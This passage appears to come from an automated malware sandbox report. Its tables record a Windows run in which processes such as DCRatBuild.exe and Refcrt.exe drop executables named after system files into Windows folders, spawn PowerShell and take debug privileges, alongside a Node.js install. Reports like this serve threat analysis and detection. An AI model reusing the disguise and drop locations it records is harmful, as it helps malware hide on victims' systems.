File created C:\Program Files\nodejs\node_modules\npm\node_modules\libnpmpack\package.json C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\nodejs\node_modules\npm\node_modules\npm-bundled\lib\index.js C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\nodejs\node_modules\npm\node_modules\cli-table3\package.json C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\nodejs\node_modules\npm\node_modules\libnpmexec\lib\get-bin-from-manifest.js C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\nodejs\node_modules\npm\node_modules\wcwidth\index.js C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\nodejs\node_modules\npm\node_modules\node-gyp\gyp\pylib\gyp\generator\ninja.py C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\nodejs\node_modules\npm\node_modules\sigstore\dist\error.js C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\nodejs\node_modules\npm\lib\commands\pack.js C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\nodejs\node_etw_provider.man C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\nodejs\node_modules\npm\node_modules\minipass-json-stream\node_modules\minipass\LICENSE C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\nodejs\node_modules\npm\node_modules\isexe\mode.js C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\nodejs\node_modules\npm\node_modules\iconv-lite\lib\streams.js C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\nodejs\node_modules\npm\node_modules\tuf-js\dist\updater.d.ts C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\nodejs\node_modules\npm\node_modules\sigstore\package.json C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\nodejs\node_modules\npm\node_modules\socks-proxy-agent\dist\index.js.map C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\nodejs\corepack.cmd C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\nodejs\node_modules\npm\node_modules\safer-buffer\LICENSE C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\nodejs\node_modules\npm\man\man1\npm-explore.1 C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\nodejs\node_modules\npm\node_modules\libnpmpublish\lib\publish.js C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\nodejs\node_modules\npm\docs\output\commands\npm-search.html C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\nodejs\node_modules\npm\node_modules\sigstore\dist\types\utility.js C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\nodejs\node_modules\npm\node_modules\socks\build\client\socksclient.js C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\nodejs\node_modules\npm\node_modules\@npmcli\arborist\lib\get-workspace-nodes.js C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\nodejs\node_modules\npm\node_modules\buffer\LICENSE C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\nodejs\node_modules\npm\node_modules\node-gyp\node_modules\minipass-fetch\lib\fetch-error.js C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\nodejs\node_modules\npm\node_modules\node-gyp\LICENSE C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\nodejs\node_modules\npm\node_modules\sigstore\dist\identity\oauth.js C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\nodejs\node_modules\npm\lib\commands\exec.js C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\nodejs\node_modules\npm\node_modules\chalk\license C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\nodejs\node_modules\npm\node_modules\proc-log\LICENSE C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\nodejs\node_modules\npm\node_modules\@colors\colors\lib\maps\random.js C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\nodejs\node_modules\npm\npmrc C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\nodejs\node_modules\npm\node_modules\cssesc\bin\cssesc C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\nodejs\node_modules\npm\node_modules\postcss-selector-parser\package.json C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\nodejs\node_modules\npm\node_modules\diff\lib\util\array.js C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\nodejs\node_modules\npm\node_modules\abort-controller\browser.js C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\nodejs\node_modules\npm\docs\output\commands\npm-install-test.html C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\nodejs\node_modules\npm\node_modules\tuf-js\dist\models\root.js C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\nodejs\node_modules\npm\man\man7\workspaces.7 C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\nodejs\node_modules\npm\node_modules\node-gyp\node_modules\cacache\lib\get.js C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\nodejs\node_modules\npm\node_modules\are-we-there-yet\lib\tracker.js C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\nodejs\node_modules\npm\node_modules\debug\src\browser.js C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\nodejs\node_modules\npm\node_modules\lru-cache\index.mjs C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\nodejs\node_modules\npm\node_modules\yallist\yallist.js C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\nodejs\node_modules\npm\docs\content\commands\npm-search.md C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\nodejs\node_modules\npm\node_modules\tuf-js\dist\models\index.js C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\nodejs\node_modules\npm\node_modules\text-table\example\dotalign.js C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\nodejs\node_modules\npm\node_modules\semver\ranges\max-satisfying.js C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\nodejs\node_modules\npm\node_modules\encoding\package.json C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\nodejs\node_modules\npm\docs\content\commands\npm-rebuild.md C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\nodejs\node_modules\npm\node_modules\semver\ranges\valid.js C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\nodejs\node_modules\npm\node_modules\node-gyp\node_modules\unique-slug\lib\index.js C:\Windows\system32\msiexec.exe N/A
File created C:\Program Files\nodejs\node_modules\npm\docs\output\commands\npm-access.html C:\Windows\system32\msiexec.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\INF\29c1c3cc0f7685 C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
File opened for modification C:\Windows\Installer\MSIB093.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIB140.tmp C:\Windows\system32\msiexec.exe N/A
File created \??\c:\Windows\INF\unsecapp.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe N/A
File created C:\Windows\Installer\SourceHash{EFA235B5-C6A1-42E6-9BC9-02A8D56F1CDC} C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\BitLockerDiscoveryVolumeContents\e6c9b481da804f C:\winNet\ComContainerbrowserRefRuntime.exe N/A
File opened for modification C:\Windows\Installer\MSI9B78.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\{EFA235B5-C6A1-42E6-9BC9-02A8D56F1CDC}\NodeIcon C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Globalization\69ddcba757bf72 C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
File created C:\Windows\INF\unsecapp.exe C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
File opened for modification C:\Windows\Installer\MSICC00.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\e57ab15.msi C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\inprogressinstallinfo.ipi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIC288.tmp C:\Windows\system32\msiexec.exe N/A
File created \??\c:\Windows\ServiceProfiles\LocalService\AppData\Local\WaaSMedicAgent.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe N/A
File opened for modification C:\Windows\Globalization\smss.exe C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
File created C:\Windows\ImmersiveControlPanel\de-DE\fontdrvhost.exe C:\winNet\ComContainerbrowserRefRuntime.exe N/A
File created C:\Windows\BitLockerDiscoveryVolumeContents\OfficeClickToRun.exe C:\winNet\ComContainerbrowserRefRuntime.exe N/A
File created \??\c:\Windows\Globalization\smss.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe N/A
File created \??\c:\Windows\ServiceProfiles\LocalService\AppData\Local\CSC70844B7B29D341BB8FFEB0D5E4D717C1.TMP C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe N/A
File opened for modification C:\Windows\Installer\MSIEE20.tmp C:\Windows\system32\msiexec.exe N/A
File created \??\c:\Windows\INF\CSCDBBF15C0A2E44A13B9B3BE52BA80BFB1.TMP C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe N/A
File opened for modification C:\Windows\Installer\MSIA0F9.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\ServiceProfiles\LocalService\AppData\Local\c82b8037eab33d C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIB20C.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\{EFA235B5-C6A1-42E6-9BC9-02A8D56F1CDC}\NodeIcon C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\e57ab19.msi C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\ServiceProfiles\LocalService\AppData\Local\WaaSMedicAgent.exe C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
File created \??\c:\Windows\Globalization\CSC2CD0480A80E4347B591AF5A63AD67F8.TMP C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe N/A
File opened for modification C:\Windows\Installer\MSI9C06.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Globalization\smss.exe C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
File opened for modification C:\Windows\Installer\e57ab15.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\ C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSICB91.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIEDF0.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI9E1A.tmp C:\Windows\system32\msiexec.exe N/A

Enumerates physical storage devices

Modifies data under HKEY_USERS

Description Indicator Process Target
Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = a6d8ff0076b9ed00429ce3000078d700005a9e000042750000264200f7630c00 C:\Windows\system32\LogonUI.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10" C:\Windows\system32\LogonUI.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26 C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4288567808" C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292311040" C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365271" C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1" C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1" C:\Windows\system32\LogonUI.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\27 C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292311040" C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365271" C:\Windows\system32\LogonUI.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0" C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89" C:\Windows\system32\LogonUI.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "5" C:\Windows\system32\LogonUI.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\A3A70C74FE2431248AD5F8A59570C782\5B532AFE1A6C6E24B99C208A5DF6C1CD C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5B532AFE1A6C6E24B99C208A5DF6C1CD\SourceList C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5B532AFE1A6C6E24B99C208A5DF6C1CD\SourceList\PackageName = "node-v18.16.0-x64.msi" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5B532AFE1A6C6E24B99C208A5DF6C1CD\SourceList\Media\1 = ";" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3419463127-3903270268-2580331543-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\solara.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\5B532AFE1A6C6E24B99C208A5DF6C1CD\EnvironmentPathNode = "EnvironmentPath" C:\Windows\system32\msiexec.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5B532AFE1A6C6E24B99C208A5DF6C1CD\Clients = 3a0000000000 C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3419463127-3903270268-2580331543-1000_Classes\Local Settings C:\DriversavessessionDlldhcp\Roblox.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\5B532AFE1A6C6E24B99C208A5DF6C1CD C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\5B532AFE1A6C6E24B99C208A5DF6C1CD\EnvironmentPath C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5B532AFE1A6C6E24B99C208A5DF6C1CD\PackageCode = "347C7A52EDBDC9A498427C0BC7ABB536" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5B532AFE1A6C6E24B99C208A5DF6C1CD\Version = "303038464" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5B532AFE1A6C6E24B99C208A5DF6C1CD\AdvertiseFlags = "388" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3419463127-3903270268-2580331543-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\Frage build.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3419463127-3903270268-2580331543-1000_Classes\Local Settings C:\winNet\ComContainerbrowserRefRuntime.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5B532AFE1A6C6E24B99C208A5DF6C1CD\ProductIcon = "C:\\Windows\\Installer\\{EFA235B5-C6A1-42E6-9BC9-02A8D56F1CDC}\\NodeIcon" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3419463127-3903270268-2580331543-1000_Classes\Local Settings C:\winNet\ComContainerbrowserRefRuntime.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\5B532AFE1A6C6E24B99C208A5DF6C1CD\corepack C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\5B532AFE1A6C6E24B99C208A5DF6C1CD\NodeRuntime C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5B532AFE1A6C6E24B99C208A5DF6C1CD\SourceList\Media C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\5B532AFE1A6C6E24B99C208A5DF6C1CD\NodeEtwSupport = "NodeRuntime" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\5B532AFE1A6C6E24B99C208A5DF6C1CD\EnvironmentPathNpmModules = "EnvironmentPath" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5B532AFE1A6C6E24B99C208A5DF6C1CD\Assignment = "1" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5B532AFE1A6C6E24B99C208A5DF6C1CD\InstanceType = "0" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5B532AFE1A6C6E24B99C208A5DF6C1CD C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5B532AFE1A6C6E24B99C208A5DF6C1CD\Language = "1033" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\A3A70C74FE2431248AD5F8A59570C782 C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5B532AFE1A6C6E24B99C208A5DF6C1CD\SourceList\Net C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5B532AFE1A6C6E24B99C208A5DF6C1CD\SourceList\Net\1 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\5B532AFE1A6C6E24B99C208A5DF6C1CD\npm C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5B532AFE1A6C6E24B99C208A5DF6C1CD\ProductName = "Node.js" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5B532AFE1A6C6E24B99C208A5DF6C1CD\AuthorizedLUAApp = "0" C:\Windows\system32\msiexec.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5B532AFE1A6C6E24B99C208A5DF6C1CD\DeploymentFlags = "3" C:\Windows\system32\msiexec.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\5B532AFE1A6C6E24B99C208A5DF6C1CD\SourceList\LastUsedSource = "n;1;C:\\Users\\Admin\\AppData\\Local\\Temp\\" C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3419463127-3903270268-2580331543-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\DCRatBuild.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\5B532AFE1A6C6E24B99C208A5DF6C1CD\DocumentationShortcuts C:\Windows\system32\msiexec.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\PING.EXE N/A
N/A N/A C:\Windows\system32\PING.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\en-US\services.exe N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\en-US\services.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\en-US\services.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\en-US\services.exe N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\en-US\services.exe N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\en-US\services.exe N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\en-US\services.exe N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\en-US\services.exe N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\en-US\services.exe N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\en-US\services.exe N/A
N/A N/A C:\Program Files (x86)\Internet Explorer\en-US\services.exe N/A
N/A N/A C:\winNet\ComContainerbrowserRefRuntime.exe N/A
N/A N/A C:\winNet\ComContainerbrowserRefRuntime.exe N/A
N/A N/A C:\winNet\ComContainerbrowserRefRuntime.exe N/A
N/A N/A C:\winNet\ComContainerbrowserRefRuntime.exe N/A
N/A N/A C:\winNet\ComContainerbrowserRefRuntime.exe N/A
N/A N/A C:\winNet\ComContainerbrowserRefRuntime.exe N/A
N/A N/A C:\winNet\ComContainerbrowserRefRuntime.exe N/A
N/A N/A C:\winNet\ComContainerbrowserRefRuntime.exe N/A
N/A N/A C:\winNet\ComContainerbrowserRefRuntime.exe N/A
N/A N/A C:\winNet\ComContainerbrowserRefRuntime.exe N/A
N/A N/A C:\winNet\ComContainerbrowserRefRuntime.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\SolaraBootstrapper.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\bridgechainsavesmonitor\Refcrt.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeTcbPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeImpersonatePrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\msiexec.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
